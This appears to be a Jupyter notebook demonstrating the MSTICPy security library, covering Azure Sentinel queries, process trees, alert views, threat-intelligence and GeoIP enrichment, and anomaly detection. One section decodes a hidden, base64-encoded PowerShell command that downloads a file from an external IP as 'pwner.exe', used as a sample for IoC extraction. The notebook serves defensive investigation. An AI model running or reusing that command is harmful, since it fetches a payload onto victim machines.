# MSTICPy v1.0.0 Overview

This notebook is used to demonstrate some of the functionality of MSTICPy.
New functionality is being added all the time (and old functionality improved -
or, at least, that is the plan) so be sure to check the latest documentation
on [MSTICPy Readthedocs](https://msticpy.readthedocs.io/en/latest/index.html)

## Pre-requisites

### Data
The first part of the notebook uses live data so must be run using a live
Azure Sentinel subscription. The latter half uses captive data so can be run 
without Azure Sentinel.

### Threat Intelligence and Geo-location provider subscriptions
This notebook uses examples that assume that you have an account with one or
more of:
- VirusTotal
- AlienVault OTX
- IBM XForce
- Maxmind GeoLite

These providers all have free account tiers.

You can also use Azure Sentinel TI as a threat intelligence provider
but it is a good idea to have more than one provider available.

For more information on setting up accounts and configuring TI and GeoIP
providers see the following instructions:
- [MSTICPy configuration file](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html)
- [TI Provider configuration](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html#configuration-file)
- [GeoIP configuration](https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html#maxmind-geo-ip-lite-lookup-class)

You may also want to use the [MPConfigEdit](https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#msticpy-settings-editor)
tool to manage these settings.


# Load and initialize MSTICPy and the Notebook environment

Note that the first function called `check_versions` is only
available in Azure Machine Learning (AzML). It is copied to your AzML
workspace when you first launch a notebook from the Azure Sentinel UI.
Although some of its functions are only relevant to AzML it has some
useful version checks. You can get a copy 
[here](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/utils/nb_check.py)

In [1]:
from pathlib import Path
from IPython.display import display, HTML

REQ_PYTHON_VER = "3.6"
REQ_MSTICPY_VER = "1.0.0"

display(HTML("<h3>Starting Notebook setup...</h3>"))

# This is only available/relevant to use in Azure Sentinel/AzureML
if Path("../utils/nb_check.py").is_file():
    from utils.nb_check import check_versions
    check_versions(REQ_PYTHON_VER, REQ_MSTICPY_VER)


from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals(),
    # extra_imports=["my_module, class", "my_module.sub, func, alias"],
    # additional_packages=["pytest", "plotly"],
);


## Configuration
You may get warnings about missing configuration from `init_notebook`. MSTICPy uses
a lot of external services (in addition to Azure Sentinel) - e.g. threat intelligence
and IP geo-location providers. Each service typically needs an account (that you
need to create) and MSTICPy needs to be able to access that account information in
order to use the service. To do that we store this data in a central configuration
file - `msticpyconfig.yaml`. 

To learn more about setting this up see these two notebooks:

- [Getting Started with Azure Sentinel Notebooks](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/A%20Getting%20Started%20Guide%20For%20Azure%20Sentinel%20ML%20Notebooks.ipynb)
- [Configuring the Notebook Environment](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/ConfiguringNotebookEnvironment.ipynb)

### MSTICPy imports

The `init_notebook` function imports a number of MSTICPy components and some other common modules such as pandas and numpy.

We can see things that have been imported.

In [5]:
print([obj for obj in dir() if not obj.startswith("_")])



# Data Queries

Data queries are the foundation of any analysis or investigation.
If you can't query data you have nothing to analyze.

First we need to load and authenticated to the data provider. The example shown
is for Azure Sentinel but other data providers are supported such as:
- Microsoft Defender
- Splunk
- Microsoft Graph

In [283]:
# See if we have an Azure Sentinel Workspace defined in our config file.
# If not, let the user specify Workspace and Tenant IDs

ws_config = WorkspaceConfig("CyberSecuritySoc")
if not ws_config.config_loaded:
    ws_config.prompt_for_ws()
    
print("Workspace Config:", ws_config)
qry_prov = QueryProvider(data_environment="AzureSentinel")
print("done")


Workspace Config: {'workspace_id': '8ecf8077-cf51-4820-aadd-14040956f35d', 'tenant_id': '72f988bf-86f1-41af-91ab-2d7cd011db47'}
done


In [284]:
qry_prov.connect(ws_config)

<IPython.core.display.Javascript object>

<IPython.core.display.Javascript object>

## What queries are available

You can choose from a set of predefined queries ([this list](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataQueries.html) is
usually up-to-date but the code itself is the real authority since we add
new queries frequently)

The easiest way to see the available queries is with the query browser.
This also lets you view usage/parameter information for each query.

In [275]:
qry_prov.browse_queries()

VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

### Command-line alternative

Command-line enthusiasts can use:
```python
qry_prov.list_queries()
```
```
['Azure.get_vmcomputer_for_host',
 'Azure.get_vmcomputer_for_ip',
 'Azure.list_aad_signins_for_account',
 'Azure.list_aad_signins_for_ip',
 'Azure.list_all_signins_geo',
 'Azure.list_azure_activity_for_account',
 'Azure.list_azure_activity_for_ip',
 'Azure.list_azure_activity_for_resource',
 'Azure.list_storage_ops_for_hash',
 'Azure.list_storage_ops_for_ip',
 'AzureNetwork.az_net_analytics',
 ...
```

Or Jupyter/IPython tab-completion.
You can use a trailing "?" to see the syntax and required parameters of
the query
```python
qry_prov.Azure.list_azure_activity_for_account?
```
```
Lists Azure Activity for Account

Parameters
----------
account_name: str
    The account name to find
add_query_items: str (optional)
    Additional query clauses
end: datetime (optional)
...
```



### Viewing help for a query function from the command line.

In [19]:
qry_prov.Azure.list_azure_activity_for_account?

[1;31mSignature:[0m       [0mqry_prov[0m[1;33m.[0m[0mAzure[0m[1;33m.[0m[0mlist_azure_activity_for_account[0m[1;33m([0m[1;33m*[0m[0margs[0m[1;33m,[0m [1;33m**[0m[0mkwargs[0m[1;33m)[0m [1;33m->[0m [0mUnion[0m[1;33m[[0m[0mpandas[0m[1;33m.[0m[0mcore[0m[1;33m.[0m[0mframe[0m[1;33m.[0m[0mDataFrame[0m[1;33m,[0m [0mAny[0m[1;33m][0m[1;33m[0m[1;33m[0m[0m
[1;31mCall signature:[0m  [0mqry_prov[0m[1;33m.[0m[0mAzure[0m[1;33m.[0m[0mlist_azure_activity_for_account[0m[1;33m([0m[1;33m*[0m[0margs[0m[1;33m,[0m [1;33m**[0m[0mkwargs[0m[1;33m)[0m[1;33m[0m[1;33m[0m[0m
[1;31mType:[0m            partial
[1;31mString form:[0m     functools.partial(<bound method QueryProvider._execute_query of <msticpy.data.data_providers.Quer <...> object at 0x0000021CB07EA348>>, query_path='Azure', query_name='list_azure_activity_for_account')
[1;31mFile:[0m            c:\users\ian\anaconda3\envs\condadev\lib\functools.py
[1;31mDocstri

### Timespans

Nearly all queries need a time range parameter. You can specify this as a parameter
to the query function but you can also the `QueryTime` widget to set your
desired time range and just pass it to the query.

In [276]:
timespan = nbwidgets.QueryTime(units="day", auto_display=True)

VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…

In [65]:
result_df = qry_prov.WindowsSecurity.list_host_processes(timespan, host_name="VictimPC")
print("Result type:", type(result_df))
result_df.head(3)

<IPython.core.display.Javascript object>

Result type: <class 'pandas.core.frame.DataFrame'>


Unnamed: 0,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
0,8ecf8077-cf51-4820-aadd-14040956f35d,CONTOSO\VICTIMPC$,4688,2021-04-16 23:10:20.007000+00:00,VictimPc.Contoso.Azure,S-1-5-18,VICTIMPC$,CONTOSO,0x3e7,0x2924,C:\Windows\System32\cscript.exe,%%1936,0xb2c,"""C:\windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,f6638b82-98a5-4542-8bec-6bc0977f793f,2021-04-16 23:10:20.007000+00:00
1,8ecf8077-cf51-4820-aadd-14040956f35d,CONTOSO\VICTIMPC$,4688,2021-04-16 23:10:20.013000+00:00,VictimPc.Contoso.Azure,S-1-5-18,VICTIMPC$,CONTOSO,0x3e7,0x1cd0,C:\Windows\System32\conhost.exe,%%1936,0x2924,\??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cscript.exe,0x0,f6638b82-98a5-4542-8bec-6bc0977f793f,2021-04-16 23:10:20.013000+00:00
2,8ecf8077-cf51-4820-aadd-14040956f35d,CONTOSO\VICTIMPC$,4688,2021-04-16 23:10:31.817000+00:00,VictimPc.Contoso.Azure,S-1-5-18,VICTIMPC$,CONTOSO,0x3e7,0x1894,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,%%1936,0xcac,2796,C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,0x0,f6638b82-98a5-4542-8bec-6bc0977f793f,2021-04-16 23:10:31.817000+00:00


### Extend an existing query

In [None]:
qry_prov.WindowsSecurity.list_host_processes(
    timespan,
    host_name="VictimPC",
    add_query_items="| summarize count() by NewProcessName | limit 10"
)

### Write your own query

In [67]:
qry_prov.exec_query("SecurityEvent | take 1000 | summarize count() by Computer, EventID | take 5")

<IPython.core.display.Javascript object>

Unnamed: 0,Computer,EventID,count_
0,AdminPc2.Contoso.Azure,8002,4
1,AdminPc2.Contoso.Azure,4688,4
2,AdminPc2.Contoso.Azure,5379,4
3,SHIR-Hive,4625,521
4,SHIR-Hive,5379,1


# Visualize the data in a timeline

Note: if you are running this notebook without an Azure Sentinel subscription
(or other log data source that you can load into a pandas DataFrame) you can
do the following to run the the first two visualizations in the this section:

- Run the cell "Retrieve sample data files" (towards the end of the notebook)
- run the following Python code
```python
result_df = qry_prov_loc.WindowsSecurity.list_host_processes()
```

## Event Timelines

In [69]:
result_df.mp_timeline.plot(source_columns=["Account", "NewProcessName", "CommandLine"], group_by="Account")

## Process Trees

In [281]:
(
    result_df
    .query("Account != 'CONTOSO\VICTIMPC$' ")
    .mp_process_tree
    .plot(legend_col="Account", show_table=True)
)

HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))

(Figure(id='10888', ...), Column(id='11016', ...))

## Viewing Alerts

In [285]:
alert_list = qry_prov.SecurityAlert.list_alerts(timespan)

alert_list.mp_timeline.plot(source_columns=["AlertName","ExtendedProperties"], group_by="Severity", height=200)
alert_select = nbwidgets.SelectAlert(alerts=alert_list, action=nbdisplay.format_alert, auto_display=True)

<IPython.core.display.Javascript object>

VBox(children=(Text(value='', description='Filter alerts by title:', style=DescriptionStyle(description_width=…

Unnamed: 0,161
TenantId,8ecf8077-cf51-4820-aadd-14040956f35d
TimeGenerated,2021-04-20 23:45:30.306000+00:00
AlertDisplayName,Suspected credential theft activity
AlertName,Suspected credential theft activity
Severity,Medium
Description,This program exhibits suspect characteristics potentially associated with credential theft. Onc...
ProviderName,MDATP
VendorName,Microsoft
VendorOriginalId,da637532137136307388_199025118
SystemAlertId,9e51aab6-9d1d-23dd-36ee-f37e99e68ca4


In [90]:
nbdisplay.plot_entity_graph(
    security_alert_graph.create_alert_graph(SecurityAlert(alert_select.selected_alert))
)

# Enrichment with Threat Intelligence, WhoIs and GeoIP

We're going to use Pivot functions here to allow us to focus on IP-specific operations

In [118]:
from msticpy.datamodel.pivot import Pivot
IpAddress = entities.IpAddress

pivot = Pivot(namespace=globals())

# Example of an IpAddress Pivot function
IpAddress.util.whois("23.102.129.200")

Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank


Unnamed: 0,asn,asn_cidr,asn_country_code,asn_date,asn_description,asn_registry,nets,nir,query,raw,raw_referral,referral
0,8075,23.102.0.0/16,US,2013-06-18,"MICROSOFT-CORP-MSN-AS-BLOCK, US",arin,"[{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....",,23.102.129.200,,,


## Side note - discovering pivot functions

If what you want to do is entity related, there is a good chance
that the MSTICPy function will appear as an entity *pivot function*.

### What is an Entity?
An entity is essentially a "noun" in the CyberSec world - e.g. IP Address, host, URL.
They are typically things that do things or have things done to them. Entities
will always have one or more properties that identify the entity or provide
additional context information. For example, an IpAddress entity has its primary
Address property and it might also have contextual properties like geo-location
or ASN data.

Pivot functions are verbs that performs investigative actions (like data queries)
on the entity and return a result. Host, for example, has data queries that
retrieve process or logon events logged for that host. IpAddress has functions
to lookup its geolocation or query information about the address from
Threat intelligence providers.

The easiest way to view the entities, their pivot functions and
help associated with each function is to use the Pivot browser.

In [286]:
pivot.browse()

VBox(children=(HBox(children=(VBox(children=(HTML(value='<b>Entities</b>'), Select(description='entity', layou…

## Build a pipeline to do everything at once

Note: we join the results of each step to the previous.
We also add a call to mp_pivot.display() to show intermediate results

In [116]:
IpAddress = entities.IpAddress

enriched_ip_df = (
    pd.DataFrame(alert_select.selected_alert.Entities)
    .mp_pivot.run(IpAddress.util.whois, column="Address", join="inner")
    .dropna(axis=1)
    .mp_pivot.run(IpAddress.util.geoloc, column="Address", join="left")
    .mp_pivot.display(title="GeoIP and Whois", cols=["Address", "asn_description", "City", "State", "CountryCode"])
    .mp_pivot.run(IpAddress.ti.lookup_ip, column="Address", join="left")
)

Unnamed: 0,Address,asn_description,City,State,CountryCode
0,23.102.129.200,"MICROSOFT-CORP-MSN-AS-BLOCK, US",San Antonio,Texas,US
1,52.156.139.47,"MICROSOFT-CORP-MSN-AS-BLOCK, US",,Washington,US
2,20.84.50.45,"MICROSOFT-CORP-MSN-AS-BLOCK, US",Washington,Virginia,US
3,52.247.224.91,"MICROSOFT-CORP-MSN-AS-BLOCK, US",,Washington,US


## Display the TI Results in a browsable format

In [287]:
TILookup.browse_results(enriched_ip_df)

VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

0,1
XForce,
score,1
cats,
categoryDescriptions,
reason,Regional Internet Registry
reasonDescription,One of the five RIRs announced a (new) location mapping of the IP.
tags,[]


# Investigating Obfuscated commands

```bash
powershell.exe  -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==
```

In [288]:
encoded_cmd = '''
powershell.exe  -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc
XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==
'''

print(f"Encoded string: {encoded_cmd}")
dec_string, dec_df = base64unpack.unpack_items(input_string=encoded_cmd)
print("Decoded string:", dec_string)

# Extract any IoCs that we can check in TI providers
iocs = IoCExtract().extract_df(data=dec_df, columns="decoded_string")
md("IoCs Found", "bold, large")
display(iocs)

# Lookup and display TI results
ti_results = ti_lookup.lookup_iocs(data=iocs, obs_col="Observable")
ti_lookup.browse_results(ti_results)

Encoded string: 
powershell.exe  -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc
XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==

Decoded string: 
powershell.exe  -nop -w hidden -encodedcommand <decoded type='string' name='[None]' index='1' depth='1'>Invoke-WebRequest -Uri "http://38.75.137.9:9088/static/encrypt.min.js" -OutFile "c:\pwner.exe"</decoded>
AA


Unnamed: 0,IoCType,Observable,SourceIndex,Input
0,ipv4,38.75.137.9,0,"Invoke-WebRequest -Uri ""http://38.75.137.9:9088/static/encrypt.min.js"" -OutFile ""c:\pwner.exe"""
1,url,http://38.75.137.9:9088/static/encrypt.min.js,0,"Invoke-WebRequest -Uri ""http://38.75.137.9:9088/static/encrypt.min.js"" -OutFile ""c:\pwner.exe"""


VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

0,1
OTX,
pulse_count,4
names,"['Underminer.EK - Exploit Kit IOC Feed', '', 'Underminer.EK - Exploit Kit IOC Feed', 'Underminer EK']"
tags,"[['Underminer.EK'], ['Underminer.EK'], ['Underminer.EK'], []]"
references,"[[], [], [], ['https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/']]"


## Plot GeoLocation of our bad IP address(es)

In [198]:
geo_locations = (
    # Use pivot function to lookup location
    IpAddress.util.geoloc(iocs.query("IoCType == 'ipv4'").drop_duplicates(),
                          column="Observable")
    # Convert the location data to GeoLocation entities
    .apply(entities.GeoLocation, axis=1)
)

# Create a map
geo_map = FoliumMap(zoom_start=10, height="75%", width="75%")
geo_map.add_geoloc_cluster(geo_locations, color='red')
geo_map.center_map()

# Display the map
utils.md("Geolocations for IP addresses", "large, bold")
utils.md("Click on a marker for more information")
display(geo_map.folium_map)

# Using advanced analysis (AKA simple machine learning)

## Retrieve sample data files

In [292]:
from urllib.request import urlretrieve
from pathlib import Path
from tqdm.auto import tqdm

github_uri = "https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/{file_name}"
github_files = {
    "exchange_admin.pkl": "data",
    "processes_on_host.pkl": "data",
    "timeseries.pkl": "data",
    "data_queries.yaml": "data",
}

Path("data").mkdir(exist_ok=True)
for file, path in tqdm(github_files.items(), desc="File download"):
    file_path = Path(path).joinpath(file)
    print(file_path, end=", ")
    url_path = f"{path}/{file}" if path else file
    urlretrieve(
        github_uri.format(file_name=url_path),
        file_path
    )
    assert Path(file_path).is_file()
    
qry_prov_loc = QueryProvider("LocalData", data_paths=["./data"], query_paths=["./data"])
qry_prov_loc.connect()

File download:   0%|          | 0/4 [00:00<?, ?it/s]

data\exchange_admin.pkl, data\processes_on_host.pkl, data\timeseries.pkl, data\data_queries.yaml, Connected.


## Time Series Decomposition - Anomaly detection

In [293]:
ob_bytes_per_hour = qry_prov_loc.Network.get_network_summary(timespan)
md("Sample data:", "large")
ob_bytes_per_hour.head(3)

Unnamed: 0_level_0,TotalBytesSent
TimeGenerated,Unnamed: 1_level_1
2020-07-06 00:00:00+00:00,10823
2020-07-06 01:00:00+00:00,14821
2020-07-06 02:00:00+00:00,13532


In [209]:
from msticpy.nbtools.timeseries import display_timeseries_anomolies
from msticpy.analysis.timeseries import timeseries_anomalies_stl

# Conduct our timeseries analysis
ts_analysis = timeseries_anomalies_stl(ob_bytes_per_hour)
# Visualize the timeseries and any anomalies
display_timeseries_anomolies(data=ts_analysis, y= 'TotalBytesSent');

md("We can see two clearly anomalous data points representing unusual outbound traffic.<hr>", "bold")

<hr>

## Detecting anomalous sequences using Markov Chain

The **anomalous_sequence** MSTICPy package uses Markov Chain analysis to predict the probability<br>
that a particular sequence of events will occur given what has happened in the past.

Here we're applying it to Office activity. 


## Query the data

In [212]:
query = """
| where TimeGenerated >= ago(60d)
| where RecordType_s == 'ExchangeAdmin'
| where UserId_s !startswith "NT AUTHORITY"
| where UserId_s !contains "prod.outlook.com"  
| extend params = todynamic(strcat('{"', Operation_s, '" : ', tostring(Parameters_s), '}')) 
| extend UserId = UserId_s, ClientIP = ClientIP_s, Operation = Operation_s
| project TimeGenerated= Start_Time_t, UserId, ClientIP, Operation, params
| sort by UserId asc, ClientIP asc, TimeGenerated asc
| extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP))
| summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation),
params=makelist(params) by UserId, ClientIP, begin
| project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, cmds, params
"""
exchange_df = qry_prov_loc.Azure.OfficeActivity(add_query_items=query)
print(f"Number of events {len(exchange_df)}")
exchange_df.drop(columns="params").head()

Number of events 146


Unnamed: 0,UserId,ClientIP,nCmds,nDistinctCmds,begin,end,duration,cmds
0,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,28,1,2020-06-21 02:36:46+00:00,2020-06-21 02:36:46+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."
1,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,28,1,2020-06-21 05:31:34+00:00,2020-06-21 05:31:34+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."
2,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,2,1,2020-06-22 02:27:06+00:00,2020-06-22 02:27:06+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy]"
3,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,26,1,2020-06-22 02:30:52+00:00,2020-06-22 02:30:52+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."
4,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,28,1,2020-06-22 04:55:59+00:00,2020-06-22 04:55:59+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."


## Perform Anomalous Sequence analysis on the data

The analysis groups events into sessions (time-bounded and linked by a common account). It then<br>
builds a probability model for the types of *command* (E.g. "SetMailboxProperty")<br>
and the parameters and parameter values used for that command.

I.e. how likely is it that a given user would be running this sequence of commands in a logon session?

Using this probability model, we can highlight sequences that have an extremely low probability, based<br>
on prior behavior.


In [271]:
from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
from msticpy.analysis.anomalous_sequence import anomalous

# Support function to extract parameter values to a list of Cmd objects
def process_exchange_session(session_with_params):
    new_ses = []
    for cmd in session_with_params:
        cmd_name, params = next(iter(cmd.items()))
        new_ses.append(Cmd(name=cmd_name, params={param["Name"]: param["Value"] for param in params}))
    return new_ses

# apply this function to create the param_value_session column
exchange_df['param_value_session'] = exchange_df.apply(
    lambda x: process_exchange_session(session_with_params=x.params),
    axis=1
)

# create the anomaly model
modelled_df = anomalous.score_sessions(
    data=exchange_df,
    session_column='param_value_session',
    window_length=3
)

# Invert the likelihood to create rarity score and take the log to normalize the plot
modelled_df["rarity"] = np.log(1 / modelled_df.rarest_window3_likelihood)

md("Session rarity - higher score is more unusual", "large, bold")
anomalous.visualise_scored_sessions(
    data_with_scores=modelled_df,
    time_column='begin',  # this will appear on the x-axis
    score_column='rarity',  # this will appear on the y axis
    window_column='rarest_window3',  # this will represent the session in the tool-tips
    source_columns=['UserId', 'ClientIP'],  # specify any additional columns to appear in the tool-tips

)

In [289]:
import pprint

rarity_max=modelled_df["rarity"].max()
rarity_min=modelled_df["rarity"].min()
slider_step = rarity_max / 20
start_val = rarity_max - slider_step
threshold = widgets.FloatSlider(
    description="Select rarity threshold",
    max=rarity_max + slider_step,
    min=0,
    value=start_val,
    step=slider_step,
    layout=widgets.Layout(width="60%"),
    style={"description_width": "200px"},
#     readout_format=".7f"
)


disp_cols = [
    "UserId", "ClientIP", "begin", "end", "param_value_session", "rarity"
]


def show_details(disp_df):
    html = []
    for idx, (_, rarest_event) in enumerate(disp_df.iterrows(), 1):
        html.append(f"<h3>Event {idx} - Rarity: {rarest_event.rarity:.3f}</h3>")
        html.append("<hr>")
        html.append("Param session details:<br>")
        for cmd in rarest_event.param_value_session:
            html.append(f"Command: {cmd.name}<br>")
            html.append(pprint.pformat(cmd.params))
            html.append("<br>")
        html.append("<hr><br>")
    output = "".join(html) if html else "No items selected"
    return HTML(output)


def show_rows(change):
    thresh = change["new"]
    disp_df = modelled_df[modelled_df["rarity"] > thresh][disp_cols].sort_values("rarity", ascending=False)
    pd_disp.update(disp_df)
    det_disp.update(show_details(disp_df))

threshold.observe(show_rows, names="value")
md("Move the slider to see event sessions abode the selected <i>rarity</i> threshold", "bold")
display(HTML("<hr>"))
display(threshold)
display(HTML("<hr>"))
md(f"Range is {rarity_min:.3f} (min rarity) to {rarity_max:.3f} (max rarity)<br><br><hr>")
disp_df = modelled_df[modelled_df["rarity"] > start_val][disp_cols].sort_values("rarity", ascending=False)
pd_disp = display(disp_df, display_id=True)
det_disp = display(show_details(disp_df), display_id=True)

FloatSlider(value=12.238664471753138, description='Select rarity threshold', layout=Layout(width='60%'), max=1…

Unnamed: 0,UserId,ClientIP,begin,end,param_value_session,rarity
145,timvic@contoso.onmicrosoft.com,20.185.182.48:37965,2020-07-29 20:11:27+00:00,2020-07-29 20:11:27+00:00,"[Cmd(name='Update-RoleGroupMember', params={'Members': 'CBoehmSA;pcadmin;SecurityAdmins_20075581...",12.882805


In [None]:
rarest_events = (
    modelled_df[modelled_df["rarity"] > threshold.value]
    [[
        "UserId", "ClientIP", "begin", "end", "param_value_session", "rarest_window3_likelihood"
    ]]
    .rename(columns={"rarest_window3_likelihood": "likelihood"})
    .sort_values("likelihood")
)
for idx, (_, rarest_event) in enumerate(rarest_events.iterrows(), 1):
    md(f"Event {idx}", "large")
    display(pd.DataFrame(rarest_event[["UserId", "ClientIP", "begin", "end", "likelihood"]]))

    md("<hr>")
    md("Param session details:", "bold")
    for cmd in rarest_event.param_value_session:
        md(f"Command: {cmd.name}")
        md(pprint.pformat(cmd.params))
    md("<hr><br>")